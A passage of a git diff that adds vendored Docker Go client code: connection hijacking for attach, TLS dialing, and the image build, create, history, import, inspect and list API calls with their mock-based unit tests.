eventsCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + + for key, expected := range eventsCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + + buffer := new(bytes.Buffer) + + for _, e := range eventsCase.events { + b, _ := json.Marshal(e) + buffer.Write(b) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(buffer), + }, nil + }), + } + + messages, errs := client.Events(context.Background(), eventsCase.options) + + loop: + for { + select { + case err := <-errs: + if err != nil && err != io.EOF { + t.Fatal(err) + } + + break loop + case e := <-messages: + _, ok := eventsCase.expectedEvents[e.ID] + if !ok { + t.Fatalf("event received not expected with action %s & id %s", e.Action, e.ID) + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go new file mode 100644 index 0000000000..74c53f52b3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/hijack.go @@ -0,0 +1,177 @@ +package client + +import ( + "crypto/tls" + "errors" + "fmt" + "net" + "net/http" + "net/http/httputil" + "net/url" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/tlsconfig" + "github.com/docker/go-connections/sockets" + "golang.org/x/net/context" +) + +// tlsClientCon holds tls information and a dialed connection. +type tlsClientCon struct { + *tls.Conn + rawConn net.Conn +} + +func (c *tlsClientCon) CloseWrite() error { + // Go standard tls.Conn doesn't provide the CloseWrite() method so we do it + // on its underlying connection. + if conn, ok := c.rawConn.(types.CloseWriter); ok { + return conn.CloseWrite() + } + return nil +} + +// postHijacked sends a POST request and hijacks the connection. +func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) { + bodyEncoded, err := encodeData(body) + if err != nil { + return types.HijackedResponse{}, err + } + + apiPath := cli.getAPIPath(path, query) + req, err := http.NewRequest("POST", apiPath, bodyEncoded) + if err != nil { + return types.HijackedResponse{}, err + } + req = cli.addHeaders(req, headers) + + req.Host = cli.addr + req.Header.Set("Connection", "Upgrade") + req.Header.Set("Upgrade", "tcp") + + conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport)) + if err != nil { + if strings.Contains(err.Error(), "connection refused") { + return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?") + } + return types.HijackedResponse{}, err + } + + // When we set up a TCP connection for hijack, there could be long periods + // of inactivity (a long running command with no output) that in certain + // network setups may cause ECONNTIMEOUT, leaving the client in an unknown + // state. Setting TCP KeepAlive on the socket connection will prohibit + // ECONNTIMEOUT unless the socket connection truly is broken + if tcpConn, ok := conn.(*net.TCPConn); ok { + tcpConn.SetKeepAlive(true) + tcpConn.SetKeepAlivePeriod(30 * time.Second) + } + + clientconn := httputil.NewClientConn(conn, nil) + defer clientconn.Close() + + // Server hijacks the connection, error 'connection closed' expected + _, err = clientconn.Do(req) + + rwc, br := clientconn.Hijack() + + return types.HijackedResponse{Conn: rwc, Reader: br}, err +} + +func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) { + return tlsDialWithDialer(new(net.Dialer), network, addr, config) +} + +// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in +// order to return our custom tlsClientCon struct which holds both the tls.Conn +// object _and_ its underlying raw connection. The rationale for this is that +// we need to be able to close the write end of the connection when attaching, +// which tls.Conn does not provide. +func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) { + // We want the Timeout and Deadline values from dialer to cover the + // whole process: TCP connection and TLS handshake. This means that we + // also need to start our own timers now. + timeout := dialer.Timeout + + if !dialer.Deadline.IsZero() { + deadlineTimeout := dialer.Deadline.Sub(time.Now()) + if timeout == 0 || deadlineTimeout < timeout { + timeout = deadlineTimeout + } + } + + var errChannel chan error + + if timeout != 0 { + errChannel = make(chan error, 2) + time.AfterFunc(timeout, func() { + errChannel <- errors.New("") + }) + } + + proxyDialer, err := sockets.DialerFromEnvironment(dialer) + if err != nil { + return nil, err + } + + rawConn, err := proxyDialer.Dial(network, addr) + if err != nil { + return nil, err + } + // When we set up a TCP connection for hijack, there could be long periods + // of inactivity (a long running command with no output) that in certain + // network setups may cause ECONNTIMEOUT, leaving the client in an unknown + // state. Setting TCP KeepAlive on the socket connection will prohibit + // ECONNTIMEOUT unless the socket connection truly is broken + if tcpConn, ok := rawConn.(*net.TCPConn); ok { + tcpConn.SetKeepAlive(true) + tcpConn.SetKeepAlivePeriod(30 * time.Second) + } + + colonPos := strings.LastIndex(addr, ":") + if colonPos == -1 { + colonPos = len(addr) + } + hostname := addr[:colonPos] + + // If no ServerName is set, infer the ServerName + // from the hostname we're connecting to. + if config.ServerName == "" { + // Make a copy to avoid polluting argument or default. + config = tlsconfig.Clone(config) + config.ServerName = hostname + } + + conn := tls.Client(rawConn, config) + + if timeout == 0 { + err = conn.Handshake() + } else { + go func() { + errChannel <- conn.Handshake() + }() + + err = <-errChannel + } + + if err != nil { + rawConn.Close() + return nil, err + } + + // This is Docker difference with standard's crypto/tls package: returned a + // wrapper which holds both the TLS and raw connections. + return &tlsClientCon{conn, rawConn}, nil +} + +func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { + if tlsConfig != nil && proto != "unix" && proto != "npipe" { + // Notice this isn't Go standard's tls.Dial function + return tlsDial(proto, addr, tlsConfig) + } + if proto == "npipe" { + return sockets.DialPipe(addr, 32*time.Second) + } + return net.Dial(proto, addr) +} diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go new file mode 100644 index 0000000000..6fde75dcfd --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_build.go @@ -0,0 +1,123 @@ +package client + +import ( + "encoding/base64" + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" +) + +// ImageBuild sends request to the daemon to build images. +// The Body in the response implement an io.ReadCloser and it's up to the caller to +// close it. +func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) { + query, err := cli.imageBuildOptionsToQuery(options) + if err != nil { + return types.ImageBuildResponse{}, err + } + + headers := http.Header(make(map[string][]string)) + buf, err := json.Marshal(options.AuthConfigs) + if err != nil { + return types.ImageBuildResponse{}, err + } + headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) + headers.Set("Content-Type", "application/tar") + + serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers) + if err != nil { + return types.ImageBuildResponse{}, err + } + + osType := getDockerOS(serverResp.header.Get("Server")) + + return types.ImageBuildResponse{ + Body: serverResp.body, + OSType: osType, + }, nil +} + +func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (url.Values, error) { + query := url.Values{ + "t": options.Tags, + "securityopt": options.SecurityOpt, + } + if options.SuppressOutput { + query.Set("q", "1") + } + if options.RemoteContext != "" { + query.Set("remote", options.RemoteContext) + } + if options.NoCache { + query.Set("nocache", "1") + } + if options.Remove { + query.Set("rm", "1") + } else { + query.Set("rm", "0") + } + + if options.ForceRemove { + query.Set("forcerm", "1") + } + + if options.PullParent { + query.Set("pull", "1") + } + + if options.Squash { + if err := cli.NewVersionError("1.25", "squash"); err != nil { + return query, err + } + query.Set("squash", "1") + } + + if !container.Isolation.IsDefault(options.Isolation) { + query.Set("isolation", string(options.Isolation)) + } + + query.Set("cpusetcpus", options.CPUSetCPUs) + query.Set("networkmode", options.NetworkMode) + query.Set("cpusetmems", options.CPUSetMems) + query.Set("cpushares", strconv.FormatInt(options.CPUShares, 10)) + query.Set("cpuquota", strconv.FormatInt(options.CPUQuota, 10)) + query.Set("cpuperiod", strconv.FormatInt(options.CPUPeriod, 10)) + query.Set("memory", strconv.FormatInt(options.Memory, 10)) + query.Set("memswap", strconv.FormatInt(options.MemorySwap, 10)) + query.Set("cgroupparent", options.CgroupParent) + query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10)) + query.Set("dockerfile", options.Dockerfile) + + ulimitsJSON, err := json.Marshal(options.Ulimits) + if err != nil { + return query, err + } + query.Set("ulimits", string(ulimitsJSON)) + + buildArgsJSON, err := json.Marshal(options.BuildArgs) + if err != nil { + return query, err + } + query.Set("buildargs", string(buildArgsJSON)) + + labelsJSON, err := json.Marshal(options.Labels) + if err != nil { + return query, err + } + query.Set("labels", string(labelsJSON)) + + cacheFromJSON, err := json.Marshal(options.CacheFrom) + if err != nil { + return query, err + } + query.Set("cachefrom", string(cacheFromJSON)) + + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go new file mode 100644 index 0000000000..b9d04f817a --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_build_test.go @@ -0,0 +1,233 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/go-units" +) + +func TestImageBuildError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageBuild(context.Background(), nil, types.ImageBuildOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageBuild(t *testing.T) { + v1 := "value1" + v2 := "value2" + emptyRegistryConfig := "bnVsbA==" + buildCases := []struct { + buildOptions types.ImageBuildOptions + expectedQueryParams map[string]string + expectedTags []string + expectedRegistryConfig string + }{ + { + buildOptions: types.ImageBuildOptions{ + SuppressOutput: true, + NoCache: true, + Remove: true, + ForceRemove: true, + PullParent: true, + }, + expectedQueryParams: map[string]string{ + "q": "1", + "nocache": "1", + "rm": "1", + "forcerm": "1", + "pull": "1", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + SuppressOutput: false, + NoCache: false, + Remove: false, + ForceRemove: false, + PullParent: false, + }, + expectedQueryParams: map[string]string{ + "q": "", + "nocache": "", + "rm": "0", + "forcerm": "", + "pull": "", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + RemoteContext: "remoteContext", + Isolation: container.Isolation("isolation"), + CPUSetCPUs: "2", + CPUSetMems: "12", + CPUShares: 20, + CPUQuota: 10, + CPUPeriod: 30, + Memory: 256, + MemorySwap: 512, + ShmSize: 10, + CgroupParent: "cgroup_parent", + Dockerfile: "Dockerfile", + }, + expectedQueryParams: map[string]string{ + "remote": "remoteContext", + "isolation": "isolation", + "cpusetcpus": "2", + "cpusetmems": "12", + "cpushares": "20", + "cpuquota": "10", + "cpuperiod": "30", + "memory": "256", + "memswap": "512", + "shmsize": "10", + "cgroupparent": "cgroup_parent", + "dockerfile": "Dockerfile", + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + BuildArgs: map[string]*string{ + "ARG1": &v1, + "ARG2": &v2, + "ARG3": nil, + }, + }, + expectedQueryParams: map[string]string{ + "buildargs": `{"ARG1":"value1","ARG2":"value2","ARG3":null}`, + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + Ulimits: []*units.Ulimit{ + { + Name: "nproc", + Hard: 65557, + Soft: 65557, + }, + { + Name: "nofile", + Hard: 20000, + Soft: 40000, + }, + }, + }, + expectedQueryParams: map[string]string{ + "ulimits": `[{"Name":"nproc","Hard":65557,"Soft":65557},{"Name":"nofile","Hard":20000,"Soft":40000}]`, + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + AuthConfigs: map[string]types.AuthConfig{ + "https://index.docker.io/v1/": { + Auth: "dG90bwo=", + }, + }, + }, + expectedQueryParams: map[string]string{ + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289In19", + }, + } + for _, buildCase := range buildCases { + expectedURL := "/build" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check request headers + registryConfig := r.Header.Get("X-Registry-Config") + if registryConfig != buildCase.expectedRegistryConfig { + return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig) + } + contentType := r.Header.Get("Content-Type") + if contentType != "application/tar" { + return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType) + } + + // Check query parameters + query := r.URL.Query() + for key, expected := range buildCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + + // Check tags + if len(buildCase.expectedTags) > 0 { + tags := query["t"] + if !reflect.DeepEqual(tags, buildCase.expectedTags) { + return nil, fmt.Errorf("t (tags) not set in URL query properly. Expected '%s', got %s", buildCase.expectedTags, tags) + } + } + + headers := http.Header{} + headers.Add("Server", "Docker/v1.23 (MyOS)") + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + Header: headers, + }, nil + }), + } + buildResponse, err := client.ImageBuild(context.Background(), nil, buildCase.buildOptions) + if err != nil { + t.Fatal(err) + } + if buildResponse.OSType != "MyOS" { + t.Fatalf("expected OSType to be 'MyOS', got %s", buildResponse.OSType) + } + response, err := ioutil.ReadAll(buildResponse.Body) + if err != nil { + t.Fatal(err) + } + buildResponse.Body.Close() + if string(response) != "body" { + t.Fatalf("expected Body to contain 'body' string, got %s", response) + } + } +} + +func TestGetDockerOS(t *testing.T) { + cases := map[string]string{ + "Docker/v1.22 (linux)": "linux", + "Docker/v1.22 (windows)": "windows", + "Foo/v1.22 (bar)": "", + } + for header, os := range cases { + g := getDockerOS(header) + if g != os { + t.Fatalf("Expected %s, got %s", os, g) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go new file mode 100644 index 0000000000..cf023a7186 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_create.go @@ -0,0 +1,34 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" +) + +// ImageCreate creates a new image based in the parent options. +// It returns the JSON content in the response body. +func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) { + repository, tag, err := reference.Parse(parentReference) + if err != nil { + return nil, err + } + + query := url.Values{} + query.Set("fromImage", repository) + query.Set("tag", tag) + resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryImageCreate(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/images/create", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go new file mode 100644 index 0000000000..5c2edd2ad5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_create_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImageCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageCreate(context.Background(), "reference", types.ImageCreateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageCreate(t *testing.T) { + expectedURL := "/images/create" + expectedImage := "test:5000/my_image" + expectedTag := "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff" + expectedReference := fmt.Sprintf("%s@%s", expectedImage, expectedTag) + expectedRegistryAuth := "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289IiwiZW1haWwiOiJqb2huQGRvZS5jb20ifX0=" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + registryAuth := r.Header.Get("X-Registry-Auth") + if registryAuth != expectedRegistryAuth { + return nil, fmt.Errorf("X-Registry-Auth header not properly set in the request. Expected '%s', got %s", expectedRegistryAuth, registryAuth) + } + + query := r.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != expectedImage { + return nil, fmt.Errorf("fromImage not set in URL query properly. Expected '%s', got %s", expectedImage, fromImage) + } + + tag := query.Get("tag") + if tag != expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", expectedTag, tag) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + createResponse, err := client.ImageCreate(context.Background(), expectedReference, types.ImageCreateOptions{ + RegistryAuth: expectedRegistryAuth, + }) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(createResponse) + if err != nil { + t.Fatal(err) + } + if err = createResponse.Close(); err != nil { + t.Fatal(err) + } + if string(response) != "body" { + t.Fatalf("expected Body to contain 'body' string, got %s", response) + } +} diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go new file mode 100644 index 0000000000..acb1ee9278 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_history.go @@ -0,0 +1,22 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageHistory returns the changes in an image in history format. +func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) { + var history []types.ImageHistory + serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil) + if err != nil { + return history, err + } + + err = json.NewDecoder(serverResp.body).Decode(&history) + ensureReaderClosed(serverResp) + return history, err +} diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go new file mode 100644 index 0000000000..729edb1ad5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_history_test.go @@ -0,0 +1,60 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageHistoryError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageHistory(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageHistory(t *testing.T) { + expectedURL := "/images/image_id/history" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + b, err := json.Marshal([]types.ImageHistory{ + { + ID: "image_id1", + Tags: []string{"tag1", "tag2"}, + }, + { + ID: "image_id2", + Tags: []string{"tag1", "tag2"}, + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + imageHistories, err := client.ImageHistory(context.Background(), "image_id") + if err != nil { + t.Fatal(err) + } + if len(imageHistories) != 2 { + t.Fatalf("expected 2 containers, got %v", imageHistories) + } +} diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go new file mode 100644 index 0000000000..c6f154b249 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_import.go @@ -0,0 +1,37 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" +) + +// ImageImport creates a new image based in the source options. +// It returns the JSON content in the response body. +func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) { + if ref != "" { + //Check if the given image name can be resolved + if _, err := reference.ParseNamed(ref); err != nil { + return nil, err + } + } + + query := url.Values{} + query.Set("fromSrc", source.SourceName) + query.Set("repo", ref) + query.Set("tag", options.Tag) + query.Set("message", options.Message) + for _, change := range options.Changes { + query.Add("changes", change) + } + + resp, err := cli.postRaw(ctx, "/images/create", query, source.Source, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go new file mode 100644 index 0000000000..e309be74e6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_import_test.go @@ -0,0 +1,81 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageImportError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageImport(context.Background(), types.ImageImportSource{}, "image:tag", types.ImageImportOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageImport(t *testing.T) { + expectedURL := "/images/create" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + query := r.URL.Query() + fromSrc := query.Get("fromSrc") + if fromSrc != "image_source" { + return nil, fmt.Errorf("fromSrc not set in URL query properly. Expected 'image_source', got %s", fromSrc) + } + repo := query.Get("repo") + if repo != "repository_name:imported" { + return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo) + } + tag := query.Get("tag") + if tag != "imported" { + return nil, fmt.Errorf("tag not set in URL query properly. Expected 'imported', got %s", tag) + } + message := query.Get("message") + if message != "A message" { + return nil, fmt.Errorf("message not set in URL query properly. Expected 'A message', got %s", message) + } + changes := query["changes"] + expectedChanges := []string{"change1", "change2"} + if !reflect.DeepEqual(expectedChanges, changes) { + return nil, fmt.Errorf("changes not set in URL query properly. Expected %v, got %v", expectedChanges, changes) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + importResponse, err := client.ImageImport(context.Background(), types.ImageImportSource{ + Source: strings.NewReader("source"), + SourceName: "image_source", + }, "repository_name:imported", types.ImageImportOptions{ + Tag: "imported", + Message: "A message", + Changes: []string{"change1", "change2"}, + }) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(importResponse) + if err != nil { + t.Fatal(err) + } + importResponse.Close() + if string(response) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(response)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go new file mode 100644 index 0000000000..b3a64ce2f8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageInspectWithRaw returns the image information and its raw representation. +func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) { + serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ImageInspect{}, nil, imageNotFoundError{imageID} + } + return types.ImageInspect{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return types.ImageInspect{}, nil, err + } + + var response types.ImageInspect + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go new file mode 100644 index 0000000000..74a4e49805 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_inspect_test.go @@ -0,0 +1,71 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ImageInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageInspectImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ImageInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrImageNotFound(err) { + t.Fatalf("expected an imageNotFound error, got %v", err) + } +} + +func TestImageInspect(t *testing.T) { + expectedURL := "/images/image_id/json" + expectedTags := []string{"tag1", "tag2"} + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.ImageInspect{ + ID: "image_id", + RepoTags: expectedTags, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + imageInspect, _, err := client.ImageInspectWithRaw(context.Background(), "image_id") + if err != nil { + t.Fatal(err) + } + if imageInspect.ID != "image_id" { + t.Fatalf("expected `image_id`, got %s", imageInspect.ID) + } + if !reflect.DeepEqual(imageInspect.RepoTags, expectedTags) { + t.Fatalf("expected `%v`, got %v", expectedTags, imageInspect.RepoTags) + } +} diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go new file mode 100644 index 0000000000..f26464f67c --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_list.go @@ -0,0 +1,45 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// ImageList returns a list of images in the docker host. +func (cli *Client) ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) { + var images []types.ImageSummary + query := url.Values{} + + optionFilters := options.Filters + referenceFilters := optionFilters.Get("reference") + if versions.LessThan(cli.version, "1.25") && len(referenceFilters) > 0 { + query.Set("filter", referenceFilters[0]) + for _, filterValue := range referenceFilters { + optionFilters.Del("reference", filterValue) + } + } + if optionFilters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, optionFilters) + if err != nil { + return images, err + } + query.Set("filters", filterJSON) + } + if options.All { + query.Set("all", "1") + } + + serverResp, err := cli.get(ctx, "/images/json", query, nil) + if err != nil { + return images, err + } + + err = json.NewDecoder(serverResp.body).Decode(&images) + ensureReaderClosed(serverResp) + return images, err +} diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go new file mode 100644 index 0000000000..7c4a46414d --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_list_test.go @@ -0,0 +1,159 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestImageListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageList(context.Background(), types.ImageListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageList(t *testing.T) { + expectedURL := "/images/json" + + noDanglingfilters := filters.NewArgs() + noDanglingfilters.Add("dangling", "false") + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + filters.Add("dangling", "true") + + listCases := []struct { + options types.ImageListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ImageListOptions{}, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": "", + }, + }, + { + options: types.ImageListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1":true,"label2":true}}`, + }, + }, + { + options: types.ImageListOptions{ + Filters: noDanglingfilters, + }, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range 